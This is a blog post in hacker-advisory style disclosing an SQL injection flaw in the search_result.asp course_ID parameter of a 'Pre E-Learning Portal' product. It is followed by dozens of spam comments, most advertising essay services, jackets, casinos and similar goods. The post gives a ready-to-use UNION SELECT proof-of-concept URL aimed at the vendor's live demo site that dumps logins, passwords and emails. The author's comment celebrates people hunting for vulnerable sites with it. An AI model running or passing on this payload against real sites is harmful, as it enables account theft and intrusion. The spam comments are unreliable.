LFI to RCE via access_log injection

on
18

Pre E-Learning Portal SQL Injection Vuln

on

[o] Pre E-Learning Portal SQL Injection Vulnerability
Software : Pre E-Learning Portal
Vendor : http://www.preproject.com/
Demo : http://www.preprojects.com/elearning/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/


[o] Vulnerable file
search_result.asp [ course_ID ]


[o] Exploit
http://localhost/elearning/search_result.asp?courses=1&course_ID=[SQL]


[o] Proof of Concept
http://www.preprojects.com/elearning/search_result.asp?courses=1&course_ID=194+and+1=0+union+all+select+1,(login%2B':'%2Bpassword%2B':'%2Bemail),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+[login]#

u cant see the result?? press ctrl+u and scroll down.. :p

big thanks to Vrs-hCk



Comments

e Learning said…
Very nice. Thanks for sharing this and thanks to Vrs-hCk. I'm sure that lost of people will be happy with this.
March 9, 2010 at 3:49 PM
evilc0de said…
a lost of people will be search for vulnerable site too.. :))
March 10, 2010 at 9:43 AM
labatterie said…
You sure that lost of people will be happy with this.
December 2, 2010 at 8:55 PM
dissertation help said…
I have been really glad after reading this blog as the knowledge which has been given via this blog is simply tremendous. I would congratulate and appreciate the blogger for doing this much hard work.
October 11, 2011 at 12:22 AM
Anonymous said…
Thanks for making such a cool post which is really very well written.I will be referring my friends about this article.Keep up your excellency and efficiency in this levels.
Dissertation Writers | dissertation proposal | buy dissertation
October 11, 2011 at 12:30 AM
logo design competition said…
I feel strongly about it and love learning more on this topic. If possible, as you gain expertise, would you mind updating your blog with more information? It is extremely helpful for me.
October 11, 2011 at 12:38 AM
assignment writing said…
This information is very good for me . Very spacial thanks to Author of this article
December 3, 2011 at 5:34 PM
PayDay Loans said…
good to read this article, this is very informative for me.
December 18, 2011 at 8:36 PM
dusty johnson said…
This is winter jackets a really excellent study for me, Must acknowledge that you are one of the best web owners I ever saw. winter coats
January 3, 2012 at 2:28 PM
juliawells said…
Well that's Pre E-Learning Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Teamwear Football
January 4, 2012 at 5:37 AM
stevendusty said…
I just revenge of the fallen jacket discovered your website and desired to say that I have really experienced surfing around your posts shia la beouf clothing
January 11, 2012 at 7:01 PM
Käsitöö said…
When i found your current weblog site on the search engines and also test just a few within your quick discussions. Proceed to maintain upward this very good use. When i simply additional upward your current Feed for you to my own WINDOWS LIVE MESSENGER Information Viewer.
February 11, 2012 at 1:18 AM
Wholesale Sportswear said…
Well the Pre E-Learning Portal is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the search_result.asp script using the course_ID parameter.
Athletic Clothing | Mens Golf Apparel | Adidas Polo | Izod
February 23, 2012 at 8:47 AM
sandrasteve said…
The SQL injection vulnerability in search_result.asp in Pre Projects Pre E-Learning Portal allows remote attackers to execute arbitrary SQL commands via the course_ID parameter. thanks for the share the sharing this great and very informative post with us.
Where to Sell Gold | Cash Gold | Price of gold per gram
February 23, 2012 at 8:51 AM
affordable papers said…
I believe this is a great site, you are working great on the content and quality of this site at the same time.
July 25, 2012 at 12:50 PM
Unknown said…
This really is an awesome post, I’m happy I recently found.I am looking forward for your next post.
essay writing service in uk
August 1, 2012 at 12:32 PM
jakhoz said…
I hardly ever write comments on blogs, but your article urged me to praise your blog. Thanks for the read, I will surely favorite your site and check in occasionally.

essay writing help | essay writing service | cheap essay writing | affordable essay writing
August 2, 2012 at 12:51 PM
Bernard Atkinson said…
Great post... very informative for me. Thanks for sharing.
__________________________
Cheap Essay | Essay Blog
October 9, 2012 at 1:02 PM
Unknown said…
I am really love your website, it is so great. Of course, welcome to visit our website too.
-----------------------
Online Essay
October 15, 2012 at 1:55 PM
Custom Written Essays said…
Primary focus of our company is on providing custom written essays. It is our aim to provide you with personalized academic assistance in preparing dissertation proposals, theses, literature reviews, MBA projects or reports.

UK Essay Writing
October 16, 2012 at 3:43 AM
online casino said…
the large majority of excellent blogging site http://freeonlinecasinogamesx.webs.com online casino games
December 21, 2012 at 11:03 AM
PatriciaMoncrief said…
Thanks for sharing this great information and it's really wonderful to read. You are passing many important thoughts in this article. Use this best essay writing service for any future writing help.
August 4, 2015 at 2:26 PM
Monnika Jacob said…
SQL is a critical and most common vulnerability in web application. Here I am sharing wonderful platform dissertation writing services for students in the UK to learn about SQL.
April 10, 2020 at 7:16 PM
Men Cotton Jacket said…
thanks for taking the time to share with us such a great article.I really appreciate your work. ! Such a great post !
June 17, 2020 at 7:58 PM
Danny said…
E-learning is the basis of education during this challenging times of the COVID 19 pandemic. Also, don't forget to involve qualified data analysis statisticians when in need of dissertation data analysis help for your DNP, Law or any other course.
July 7, 2020 at 4:47 PM
Danny said…
SPSS Data Analysis Services I agree with your sentiments. You are such an excellent writer and I am amazed by your capabilities. Keep up the amazing effort.
July 14, 2020 at 10:42 PM
mrbobystone said…
Nice Blog ! Here We are Specialist in Manufacturing of Movies, Gaming, Casual, Faux Leather Jackets, Coats And Vests See Project Power Red Jacket
October 27, 2020 at 2:55 PM
Mark2030 said…
Thank you so much for sharing the information about Research Blog here. Dissertation Writing Services.
August 27, 2021 at 9:41 PM
eddielydon said…
Your article is such an informative article. It is glad to read such those articles thanks for sharing.
leather peacoat
October 2, 2021 at 12:56 PM
George Mark said…
I read blogs on a similar topic, but I never visited your blog. I added it to favorites and I’ll be your constant reader. yeezy gap round jacket
October 5, 2021 at 4:26 PM
deanffranklin@gmail.com said…
Thankful to you humane for giving this unbelievably surprising data. This is an awesome substance material and simple to look at. I collect various individuals visit your blog and enrapturing subject. naruto shippuden jacket
December 21, 2021 at 3:08 PM
Leyla Doyle said…
Such a very useful article. Very interesting to read this article.I would like to thank you for the efforts you had made for writing this awesome article. Oujeer - Women Trench Coat
January 26, 2022 at 1:04 PM
The Genuine Leather said…
Goodness! Much obliged to you! I constantly needed to compose on my site something to that effect. Would I be able to incorporate a part of your post into my site? Cruella Jacket
January 29, 2022 at 7:45 PM
Real Jackets said…
lakers jacket with championship I have a blog based on the same ideas you discuss and would really like to have
you share some stories/information. I know my visitors would value your work.
If you are even remotely interested, feel free to shoot me an e
February 1, 2022 at 2:24 PM
deanffranklin@gmail.com said…
Grateful to you thoughtful for giving this incomprehensibly groundbreaking information. This is a glorious substance material and easy to take a gander at. I gather different people visit your blog and enchanting subject. Yellowstone Jackets
February 15, 2022 at 12:41 PM
Albert Watson said…
As you can see in the image above, the clothing line prominently depicts a swastika-like shape on each garment. The logo may be seen on sweatshirts, shoes, jackets, and other items. Tokyo Revengers Black Bomber Tokyo Manji Gang Jacket The correctness of these designs is, of course, debatable. Because of the controversy over Tokyo Revengers' usage of the sign, Shonen Jump chose to delete swastikas from the manga.
March 12, 2022 at 7:46 PM
deanffranklin@gmail.com said…
it was so remarkable to see you seeing this point, it genuinely feels wavering. A responsibility of appreciation is for sharing such a piece of colossal information which is particularly inconspicuous consistently. I have gotten confined with your site and will raise it to my assistants and others as well. white leather jacket
March 22, 2022 at 7:55 PM
Real Jackets said…
This Blog is very informative for us. Thanks for writing about it. In this article, some examples help me in applying in daily life Yellowstone jackets
April 2, 2022 at 1:24 PM
Sarah Josave said…
This is the right place to look! This is a wonderful post, and I agree with all you've said. Much obliged! Monica Yellowstone
April 2, 2022 at 5:27 PM
Real Jackets said…
This Blog is very informative for us. Thanks for writing about it. In this article, some examples help me in applying in daily life Pelle Pelle Leather jackets
April 2, 2022 at 6:19 PM
Sarah Josave said…
I enjoyed reading your essay. Thank you so much for everything. I had a good time reading your blog. Thank you for sharing and providing this information. Engaging in a desirable pastime is great for good fortune. Monica Yellowstone
April 12, 2022 at 3:01 PM
Unknown said…
This blog is really informative.
Thank you

Best Collection
August 8, 2022 at 5:52 PM
Alen said…
The best LSAT prep course is the one that fits your learning style and schedule. There are many different courses available, so research to find the one that will work best for you.
November 10, 2022 at 2:12 PM
john said…
This post is very helpful.I like this post.marlboro leather jacket
November 28, 2022 at 8:23 PM
Vivian Raddix said…
Thanks for making such a cool post. Very informative. Planning Foreign trips? Get our expert guidance for Documentation, Eligibility checks, Visitor Visa Application. Call us now for a FREE Counseling.
January 9, 2023 at 2:39 PM
Zayn Khaled said…
An Islamic app called Prayer Time Bahrain was created to give users precise prayer times and alerts for Bahrain's five daily prayers. The software offers users precise prayer times that are computed using Bahrain's time zone, as well as a number of extra features like the qibla's direction, the ability to set up prayer alarms, and a calendar of significant Islamic holidays and events.
January 20, 2023 at 5:49 PM
Movie Outfits said…
Party Poison Jacket is the answer. Inspired by Gerard Way's electrifying persona, this USA-favorite jacket will have you turning heads and setting the scene ablaze with your fearless style.
June 2, 2023 at 7:29 AM
My Wrist Wraps said…
My Wrist Wraps make the best quality wholesale customized fitness products on the market for all your fitness needs and customize it.
Wrist Wraps
June 8, 2023 at 6:59 PM
darknet hitman said…
This is the most excellent essay I've ever read. Thank you for providing this information. Please continue to send in new content.
do hitmen still exist
June 14, 2023 at 11:05 AM
The Genuine Leather said…
Excellent article! I appreciate the useful information you provided; if you are seeking for the most recent games, you may go to this website. Comic Con Costumes For Sale
July 11, 2023 at 7:02 PM
Emma watson said…
Get ready to conquer the fashion circuit with our remarkable taylor swift ombre sequin jacket!
July 30, 2023 at 1:55 AM
USTradeEnt said…
Engaging my attention, this blog has truly captured my interest. Its captivating content draws me in, making it a compelling read.
blog
August 8, 2023 at 3:21 PM
Emma watson said…
Boldly express your love for Star Trek with the Star Trek Picard Season 3 Leather Jacket. It's not just clothing; it's a tribute to a cultural phenomenon.
August 22, 2023 at 5:22 PM
Emma watson said…
This comment has been removed by the author.
September 11, 2023 at 1:49 AM
REEDOT SPORTS said…
Reedot Sports is the manufacturer and supplier and wholesaler of custom gym gear like that custom wrist wraps and straps.
https://reedotsports.com/product/printed-wrist-wraps-wholesale/
October 9, 2023 at 6:09 AM
REEDOT SPORTS said…
Reedot sports is the manufacturer and supplier of custom gear and wear. We offer wholesale price on bulk orders
Weightlifting belts manufacturer
October 9, 2023 at 6:40 AM
ecomfist23 said…
Level up your Amazon game with our advance keyword search for PPC
because being seen is just as important as being sassy! Unleash a keyword arsenal that propels your products into the spotlight, leaving the competition in the dust. Ready to turn clicks into ka-ching? Let's make your Amazon presence as bold as your brand!
November 18, 2023 at 3:23 PM
DLSAPK Shop said…
I find that understanding to be extremely useful. Many appreciation to the person who wrote of this piece. Also Click and download games.



January 11, 2024 at 5:24 PM
alex12 said…
For the event, celebrity stylist and fashion designer Metta Conchetta meticulously crafted Jack Harlow's ensemble, dressing him in a fully iridescent ivory suit sourced from the renowned New York-based menswear label, Musika. The rapper made a stylish appearance at the Kentucky Derby, where he was seen alongside Drake. The pearly ensemble was complemented with a classic black tie, a silver watch, and black shoes, completing the sophisticated yet fashionable look.
Jack Harlow white suit
February 17, 2024 at 8:55 PM
apkino.com said…
This comment has been removed by the author.
March 23, 2024 at 1:27 AM
One Technology Services said…
In today's digital age, establishing an online presence is essential for businesses to thrive. However, with the increasing competition in the ecommerce landscape, generic solutions may no longer suffice. This is where Custom Ecommerce Developmentcomes into play, offering tailored solutions to meet the unique needs of your business.
May 3, 2024 at 10:22 PM
PikaShow APK said…
Mogul Cloud Gaming Apk makes you happy with permission to access AAA games on your smartphone. No gaming options can compete with PC games due to their HD graphics, interactive controls, and deep storytelling. Previously, people purchased costly separate personal computers or game consoles to play PC games.
May 8, 2024 at 9:16 PM
Guest posting Sites said…
ae you looking for the best wommens dress at reasonable prices then you can visit here: judy blue jeans
June 20, 2024 at 1:17 AM
Guest posting Sites said…
are you looking for the vice event ticket then you can visit here: vice event
June 20, 2024 at 2:31 AM
Guest posting Sites said…
are you looking for the mens unstitched suits then you can visit here cotton fabric
June 20, 2024 at 3:13 AM
Guest posting Sites said…
are you looking for the mens kurta items then you can purchase it from grace fabric at reasonable prices summer fabric
July 28, 2024 at 10:14 PM
JamesDnelson said…
This information is incredibly helpful—thank you to the author for this valuable article! Girls tie dye shirt
November 1, 2024 at 9:21 PM
Kayifi said…
Finding your essay was a wonderful experience. It was well-organized, informative, and exactly what I needed. Keep up the fantastic work; I appreciate it more than you know.

Kayifi
November 1, 2024 at 10:13 PM
Hamish said…
A research blog, much like the red one clothing , has the power to grab attention and make an impact. Just as a bold red outfit stands out in a crowd, a well-researched and thoughtfully presented blog can spark curiosity and leave readers with valuable insights and knowledge.






November 6, 2024 at 9:52 PM
topgurujackets said…
Thank you, Thank You, Thank you, Thanks for sharing great information.
celebrity leather jackets
November 13, 2024 at 5:34 PM
leatherswear said…
Just made a small goal for myself: try something new every month!
https://leatherswear.us/
November 14, 2024 at 8:44 PM
Post a Comment